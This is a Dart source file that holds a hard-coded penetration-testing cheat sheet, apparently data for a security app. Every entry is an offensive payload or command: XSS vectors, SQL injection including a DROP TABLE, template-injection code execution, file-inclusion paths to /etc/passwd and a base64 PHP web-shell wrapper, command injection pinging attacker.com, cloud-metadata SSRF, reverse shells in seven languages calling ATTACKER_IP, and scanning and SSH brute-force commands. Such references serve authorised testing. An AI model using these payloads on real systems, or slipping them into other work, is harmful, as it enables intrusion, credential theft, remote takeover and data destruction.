class CheatsheetData {
  static const Map<String, List<Map<String, String>>> categories = {
    'XSS Payload': [
      {'name': 'Basic Alert', 'payload': '<script>alert(1)</script>'},
      {'name': 'IMG onerror', 'payload': '<img src=x onerror=alert(1)>'},
      {'name': 'SVG onload', 'payload': '<svg onload=alert(1)>'},
      {'name': 'Body onload', 'payload': '<body onload=alert(1)>'},
      {'name': 'Event Handler', 'payload': '<div onmouseover=alert(1)>hover me</div>'},
      {'name': 'Input onfocus', 'payload': '<input onfocus=alert(1) autofocus>'},
      {'name': 'Iframe srcdoc', 'payload': '<iframe srcdoc="<script>alert(1)</script>">'},
      {'name': 'Details ontoggle', 'payload': '<details ontoggle=alert(1) open>test</details>'},
      {'name': 'Anchor javascript', 'payload': '<a href="javascript:alert(1)">click</a>'},
      {'name': 'Encoded', 'payload': '<img src=x onerror=&#97;&#108;&#101;&#114;&#116;(1)>'},
      {'name': 'Template Literal', 'payload': '<script>alert`1`</script>'},
      {'name': 'Polyglot', 'payload': "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//\u000D\u000A\u0085\u2028\u2029//</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e"},
    ],
    'SQL Injection Payload': [
      {'name': 'Basic OR', 'payload': "' OR '1'='1"},
      {'name': 'Comment bypass', 'payload': "' OR 1=1--"},
      {'name': 'Union Select', 'payload': "' UNION SELECT NULL,NULL,NULL--"},
      {'name': 'Order by enum', 'payload': "' ORDER BY 1--"},
      {'name': 'Error based', 'payload': "' AND 1=CONVERT(int,(SELECT @@version))--"},
      {'name': 'Time based blind', 'payload': "' AND SLEEP(5)--"},
      {'name': 'Boolean blind', 'payload': "' AND 1=1-- (true) vs ' AND 1=2-- (false)"},
      {'name': 'Stacked queries', 'payload': "'; DROP TABLE users--"},
      {'name': 'MySQL version', 'payload': "' UNION SELECT @@version,NULL--"},
      {'name': 'Database enum', 'payload': "' UNION SELECT schema_name,NULL FROM information_schema.schemata--"},
      {'name': 'Table enum', 'payload': "' UNION SELECT table_name,NULL FROM information_schema.tables WHERE table_schema=database()--"},
    ],
    'SSTI Payload': [
      {'name': 'Jinja2 basic', 'payload': '{{7*7}}'},
      {'name': 'Jinja2 RCE', 'payload': "{{config.__class__.__init__.__globals__['os'].popen('id').read()}}"},
      {'name': 'Twig', 'payload': '{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}'},
      {'name': 'Freemarker', 'payload': '<#assign ex="freemarker.template.utility.Execute"?new()>\${ex("id")}'},
      {'name': 'Mako', 'payload': '<%import os%>\${os.popen("id").read()}'},
      {'name': 'Smarty', 'payload': '{system("id")}'},
      {'name': 'Pebble', 'payload': '{% set cmd = \'id\' %}{% set bytes = (1).TYPE.forName(\'java.lang.Runtime\').methods[6].invoke(null,null).exec(cmd) %}'},
      {'name': 'Detection', 'payload': '\${7*7} / {{7*7}} / #{7*7} / \${7*7} / {{7*\'7\'}}'},
    ],
    'LFI Payload': [
      {'name': 'Basic /etc/passwd', 'payload': '../../../../etc/passwd'},
      {'name': 'Null byte', 'payload': '../../../../etc/passwd%00'},
      {'name': 'Double encoding', 'payload': '..%252f..%252f..%252fetc/passwd'},
      {'name': 'UTF-8 encoding', 'payload': '..%c0%af..%c0%af..%c0%afetc/passwd'},
      {'name': 'PHP wrapper', 'payload': 'php://filter/convert.base64-encode/resource=index.php'},
      {'name': 'PHP input', 'payload': 'php://input'},
      {'name': 'Data wrapper', 'payload': 'data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4='},
      {'name': 'Expect wrapper', 'payload': 'expect://id'},
      {'name': 'Windows', 'payload': '..\\..\\..\\..\\windows\\system32\\drivers\\etc\\hosts'},
      {'name': 'Proc self', 'payload': '/proc/self/environ'},
      {'name': 'Log poisoning', 'payload': '/var/log/apache2/access.log'},
    ],
    'Command Injection': [
      {'name': 'Semicolon', 'payload': '; id'},
      {'name': 'Pipe', 'payload': '| id'},
      {'name': 'AND', 'payload': '&& id'},
      {'name': 'OR', 'payload': '|| id'},
      {'name': 'Backtick', 'payload': '`id`'},
      {'name': 'Dollar', 'payload': '\$(id)'},
      {'name': 'Newline', 'payload': '%0aid'},
      {'name': 'Redirect', 'payload': '> /tmp/output'},
      {'name': 'Background', 'payload': '& id'},
      {'name': 'Blind (sleep)', 'payload': '; sleep 5'},
      {'name': 'Blind (ping)', 'payload': '; ping -c 5 attacker.com'},
    ],
    'SSRF': [
      {'name': 'Localhost', 'payload': 'http://127.0.0.1'},
      {'name': 'Localhost alt', 'payload': 'http://0.0.0.0'},
      {'name': 'IPv6 Localhost', 'payload': 'http://[::1]'},
      {'name': 'AWS Metadata', 'payload': 'http://169.254.169.254/latest/meta-data/'},
      {'name': 'GCP Metadata', 'payload': 'http://metadata.google.internal/computeMetadata/v1/'},
      {'name': 'Azure Metadata', 'payload': 'http://169.254.169.254/metadata/instance?api-version=2021-02-01'},
      {'name': 'Decimal IP', 'payload': 'http://2130706433 (127.0.0.1)'},
      {'name': 'Hex IP', 'payload': 'http://0x7f000001'},
      {'name': 'URL encoding', 'payload': 'http://127.0.0.1/%2f..%2f..'},
      {'name': 'DNS rebinding', 'payload': 'http://spoofed.burpcollaborator.net'},
      {'name': 'File protocol', 'payload': 'file:///etc/passwd'},
    ],
    'Reverse Shell': [
      {'name': 'Bash TCP', 'payload': 'bash -i >& /dev/tcp/ATTACKER_IP/PORT 0>&1'},
      {'name': 'Bash UDP', 'payload': 'bash -i >& /dev/udp/ATTACKER_IP/PORT 0>&1'},
      {'name': 'Python', 'payload': "python3 -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"ATTACKER_IP\",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"},
      {'name': 'Netcat', 'payload': 'nc -e /bin/sh ATTACKER_IP PORT'},
      {'name': 'Netcat (-c)', 'payload': 'nc -c /bin/sh ATTACKER_IP PORT'},
      {'name': 'Netcat (mkfifo)', 'payload': 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP PORT >/tmp/f'},
      {'name': 'PHP', 'payload': "php -r '\$sock=fsockopen(\"ATTACKER_IP\",PORT);exec(\"/bin/sh -i <&3 >&3 2>&3\");'"},
      {'name': 'Ruby', 'payload': "ruby -rsocket -e'f=TCPSocket.open(\"ATTACKER_IP\",PORT).to_i;exec sprintf(\"/bin/sh -i <&%d >&%d 2>&%d\",f,f,f)'"},
      {'name': 'Perl', 'payload': "perl -e 'use Socket;\$i=\"ATTACKER_IP\";\$p=PORT;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));connect(S,sockaddr_in(\$p,inet_aton(\$i)));open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");'"},
      {'name': 'PowerShell', 'payload': "powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',PORT);\$s=\$client.GetStream();[byte[]]\$b=0..65535|%{0};while((\$i=\$s.Read(\$b,0,\$b.Length))-ne 0){;\$d=(New-Object -TypeName System.Text.ASCIIEncoding).GetString(\$b,0,\$i);\$sb=(iex \$d 2>&1|Out-String);\$sb2=\$sb+'PS '+(pwd).Path+'> ';\$sb=([text.encoding]::ASCII).GetBytes(\$sb2);\$s.Write(\$sb,0,\$sb.Length);\$s.Flush()};\$client.Close()"},
    ],
    'Basic Recon Commands': [
      {'name': 'Nmap SYN scan', 'payload': 'nmap -sS -sV -O TARGET'},
      {'name': 'Nmap full scan', 'payload': 'nmap -sS -sV -sC -O -p- TARGET'},
      {'name': 'Nmap scripts', 'payload': 'nmap --script=vuln TARGET'},
      {'name': 'Dirb', 'payload': 'dirb http://TARGET /usr/share/wordlists/dirb/common.txt'},
      {'name': 'Gobuster', 'payload': 'gobuster dir -u http://TARGET -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt'},
      {'name': 'Nikto', 'payload': 'nikto -h http://TARGET'},
      {'name': 'WPScan', 'payload': 'wpscan --url http://TARGET --enumerate u,vp,vt'},
      {'name': 'SQLMap', 'payload': "sqlmap -u 'http://TARGET/page?id=1' --dbs"},
      {'name': 'Hydra SSH', 'payload': 'hydra -l admin -P /usr/share/wordlists/rockyou.txt ssh://TARGET'},
      {'name': 'Enum4linux', 'payload': 'enum4linux -a TARGET'},
      {'name': 'Whois', 'payload': 'whois TARGET'},
      {'name': 'Dig all', 'payload': 'dig TARGET ANY +noall +answer'},
      {'name': 'theHarvester', 'payload': 'theHarvester -d TARGET -b google,bing,linkedin'},
      {'name': 'Subfinder', 'payload': 'subfinder -d TARGET -o subdomains.txt'},
    ],
  };
}
